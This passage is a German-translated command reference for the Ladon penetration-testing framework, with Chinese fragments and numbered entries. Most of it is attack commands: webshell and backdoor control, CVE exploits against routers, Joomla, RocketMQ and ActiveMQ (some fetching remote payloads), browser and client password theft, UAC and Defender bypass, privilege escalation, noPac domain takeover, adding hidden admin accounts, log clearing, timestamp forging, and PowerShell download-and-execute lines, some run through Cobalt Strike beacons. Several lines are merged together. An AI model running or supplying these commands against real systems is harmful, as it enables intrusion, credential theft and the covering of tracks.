##### JSP UAshell Systemversion, Python, GCC und andere Informationen anzeigen, um die Privilegienausweitung zu erleichtern```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami
##### 169 Nicht-interaktive Verbindung der IIS-Raid-Backdoor zur Befehlsausführung```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 Router-Passwort auslesen```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc
##### 173 Hersteller über MAC abfragen (Ladon Mac MAC-Adresse)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan
##### 175 vsFTPdPoc CVE-2011-2523 vsftpd 2.3.4 Smiley-Backdoor-Schwachstellenerkennung Entfernt in 10.9```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc
Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://
##### 177 Erkennung der Exchange-Version```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
Ladon https://192.168.1.8 ExchangePoc
##### 179 Http/S Webseiten-Antwortkopfzeilen abrufen```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http 扫描IP时添加http://
Ladon ip.txt GetHead https 扫描IP时添加https://
Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://
##### 181 Http/S Domänen aus Webseiten extrahieren```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https 扫描IP时添加https://
Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

##### 183 Firefox-Passwort\Cookie\Verlauf auslesen```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe
##### 185 GetPwd unterstützt das Auslesen von Passwörtern für Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan
##### 187 XshellPwd Xshell Passwortauslesen```Bash
Ladon XshellPwd
Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684
##### 189 MssqlCmd SQL Server Remotebefehle ausführen, SQL-Version, BS-Informationen xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami
##### 191 CVE-2018-14847 Mikrotik RouterOS Version 6.29-6.42 Passwort-Auslesen```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan
##### 193 MSNSwitchPwd CVE-2022-32429 MSNSwitch Router-Passwort auslesen```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd
##### 195 T3-Protokoll-Erkennung der WebLogic-Version```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info
Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan
##### 197 VulScan PocScan mehrere Remote-Schwachstellenerkennung```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan
##### 199 JoomlaPwd CVE-2023-23752 Unbefugtes Auslesen von Website-Datenbank-Passwörtern```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan
##### 201 Citrix Gateway-Version erkennen```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer
##### 203 Defender umgehen, um PowerShell auszuführen```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public
##### 205 Bereinigen von Betriebsprotokollen .NET-Protokollierung deaktivieren```Bash
Ladon Clslog
Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo
##### 207 Mini-FTP-Server, (unterstützt Windows/Linux integrierte ftp-Befehle für Datei-Upload und -Download)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
Ladon Tcp 8080 Ladon TcpServer 80
##### 209 Überwachen von UDP-Paketdaten, Speichern als TXT und HEX, wie DNS, SNMP und andere Protokolle```Bash
Ladon UdpServer 8080
Ladon Udp 161
Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338
##### 211 CVE-2022-36537 Server Backup Manager Unautorisierte RCE-Schwachstellenerkennung (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml
##### 213 SMB vollständig deaktivieren, Port 445 deaktivieren, 0-Day, laterale Bewegung, Relay-Angriffe usw. verhindern```Bash
Ladon CloseSMB
Ladon DisService Spooler Ladon DisableService Spooler
##### 215 Angegebenen Dienst stoppen```Bash
Ladon StopService Spooler
Ladon OpenTCP 445 Ladon OpenUDP 161
##### 217 Port blockieren Port sperren```Bash
Ladon CloseTCP 445
Ladon CloseUDP 161
Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat
##### 219 RunSystem Privilegieneskalation: Administrator zu SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
Ladon RunUser cmd.exe Ladon RunUser c:\1.exe
##### 221 GodPotato Privilege Escalation Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan
##### 223 hikvision Hikvision CVE-2017-7921 Schwachstellenerkennung```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
Ladon HikvisionDecode configurationFile
##### 225 Ladon testspezifische CmdShell```Bash
Ladon web 800 cmd
Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami
##### 227 Domänenadministratoren anzeigen```Bash
Ladon QueryAdminDomain
Ladon QueryDomain
##### 229 Mndp-Protokoll-Broadcast-Erkennung von Mikrotik-Routern im gleichen Netzwerksegment```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p
##### 231 RunCmd/Cmd Cmd-Befehl ausführen / unterstützt b64cmd```Bash
Ladon cmd whoami
Ladon b64cmd d2hvYW1p
Ladon LoginLog Ladon EventLog
##### 233 Apache RocketMQ CVE-2023-33246 Exploit für Remote-Code-Ausführungsschwachstelle```Bash
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
Ladon BypassAV py xor anyNet.exe
##### 235 Systemrechte unter Win11/2022 erlangen```Bash
Ladon McpPotato whoami
Ladon Exe2Hex 1.exe
##### 237 EXE in Base64 konvertieren, CMD-Befehl in Datei schreiben```Bash
Ladon Exe2B64 1.exe
Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer
##### 239 SharpGPO Domäneneindringung Gruppenrichtlinien-Lateralbewegungswerkzeug```Bash
Ladon SharpGPO
Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"
Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo
Ladon SharpGPO --Action NewGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
Ladon IisInfo
##### 241 Spezialisierter WEB-Server für Penetrationstests – LDAP-Deserialisierung```Bash
Ladon web 800 ldap=192.168.1.8:800
Ladon web 800 rmi=192.168.1.8
##### 243 API Administrator hinzufügen (ignoriert System net, net1 Deaktivierung)```Bash
Ladon AddAdmin admin$ 123456
Ladon AddUser admin$ 123456
##### 245 API Benutzer löschen (ignoriert System net, net1.exe Deaktivierung)```Bash
Ladon DelUser admin$
Z.B. TGT-Anfragen/ST-Anfragen/AS-REP Roasting/Kerberoasting/Delegationsangriffe/Golden Ticket/Silver Ticket/Diamond Ticket/Sapphire Ticket usw.```Bash Ladon Rubeus
##### 247 noPac Domänen-Penetration Domänen-Privilegieneskalation CVE-2021-42287/CVE-2021-42278```Bash
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter
/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation
Examples:
Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
Ladon SharpGPOAbuse
##### 249 SharpSphere interagiert mit dem Gastbetriebssystem von vCenter-verwalteten virtuellen Maschinen und führt Befehle aus```Bash
Ladon SharpSphere
No verb selected.
dump Snapshot and download memory dump file
list List all VMs managed by this vCenter
execute Execute given command in target VM
c2 Run C2 using C3's VMwareShareFile module
upload Upload file to target VM
download Download file from target VM
help Display more information on a specific command.
version Display version information.
Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==
##### 251 Dcom Remote-Befehlsausführung über ShellWindows```Bash
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==
##### 253 Smtp Ntlm Erkennung von Systeminformationen (Port 25, 465, 587)```Bash
Ladon 192.168.1.8/24 SmtpInfo
Ladon 192.168.1.8/24 HttpInfo
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
Ladon DomainLog -d 7
Ladon DomainLog -h ip -d 7
Ladon DomainLog -h ip -d 7 -grep user
Ladon DomainLog -h ip -u username -p password -d 7
Ladon DomainLog -h ip -u username -p password -d 7 -all
Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res
ult.txt
##### 257 Prüfen, ob der Benutzer ein Lotus-Administrator ist```Bash
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
Ladon HtaSer Ladon HtaSer 8080
##### 259 ConfVer ConfluenceVer erkennt Confluence-Version```Bash
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
Ladon FindAD Ladon pveFindADUser
##### 261 Oracle Datenbank Remote-Privilegien-Eskalationstool Offizieller Treiber >=.net 4.8```Bash
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami
##### BuildCS Dynamisches Kompilieren von c#-Code-Dateien```Bash
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Verwendung: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"
##### Dateizeit ändern Dateizeit kopieren```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe
powershell Import-Module .\Ladon.ps1 Ladon OnlinePC
#### 0x002 Lokale nicht-interaktive Ausführung```Bash
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"
#### 0x004 Bypass PowerShell-Standardrichtlinie umgehen```Bash
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'
### Cobalt Strike Ladon.ps1
CS Beacon - Erkennung aktiver Hosts```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo
CS Beacon benutzerdefinierter Port-Scan```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'
CS Beacon MS17010 Schwachstellenerkennung```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010
http://k8gege.org/Ladon/example-en.html
Neueste Version in small seal ring: http://k8gege.org/Ladon/update.txt